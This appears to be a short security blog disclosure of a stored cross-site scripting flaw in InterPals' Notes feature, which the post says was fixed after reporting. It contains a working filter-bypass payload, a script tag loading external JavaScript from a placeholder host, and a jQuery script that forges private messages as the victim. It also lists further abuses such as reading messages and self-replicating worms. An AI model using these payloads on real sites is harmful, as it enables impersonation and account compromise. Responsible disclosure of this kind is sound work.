322 words
2 minutes
Impersonate others on InterPals

Introduction#

InterPals is the top site to meet people and make new friends, penpals, language partners, travel buddies!

--- InterPals.net

Besides the traditional messaging functionality, InterPals also has a feature called “Notes”, which allows users to create notes for themselves or fellow InterPals members. Both the messaging and notes feature share common components, but in the case of notes, there were no proper HTML sanitization upon listing and viewing.

Attack surface#

Even though there were no proper HTML sanitization for notes, there was a basic escaping mechanism in place. When characters like : or ; were present in a note, they automatically triggered the escape, which sanitized the entire body of the note.

Proof of concept#

Let’s try to send a message on behalf of our victim. Since we are unable to write meaningful JavaScript without these special characters, we need to inject the script from external sources. Let’s create a note with the following content:

<script src="http://path.to/your/malicious_script.js"></script>

Unfortunately, it triggered the escape mechanism due to the : character present in the schema. However, by using scheme-less relative URIs, we can completely bypass the mechanism.

<script src="//path.to/your/malicious_script.js"></script>

Now let us see the content of an example malicious_script.js, which sends a forged message:

$.ajax({
  type: 'POST',
  url: 'http://www.interpals.net/pm.php',
  data: {
    action: 'add_contact',
    username: 'TARGET_NAME'
  },
  success: function(data) {
    var id = data.thread_id;

    $.ajax({
      type: 'POST',
      url: 'http://www.interpals.net/pm.php',
      data: {
        action: 'send_message',
        thread: id,
        message: "XSS TEST MESSAGE"
      },
      success: function(data) {
        console.log('Forged message sent');
      }
    });
  },
  dataType: 'json'
});

When a victim opens the malicious note, the script is executed and the message “XSS TEST MESSAGE” is sent immediately to the user identified by “TARGET_NAME” by the victim.

xss-test-message

In a similar manner we could have altered their profile, settings, etc.

  • or read their private messages
  • or deleted their account
  • or performed a denial-of-service attack by a chain reaction of self-replicating XSS messages

Users can be easily tricked into clicking the following innocent looking URLs, which automatically execute the malicious script:

http://www.interpals.net/app/notes?uid=1234
http://www.interpals.net/app/note?nid=1234

Mitigation#

This vulnerability was reported to InterPals and was fixed immediately.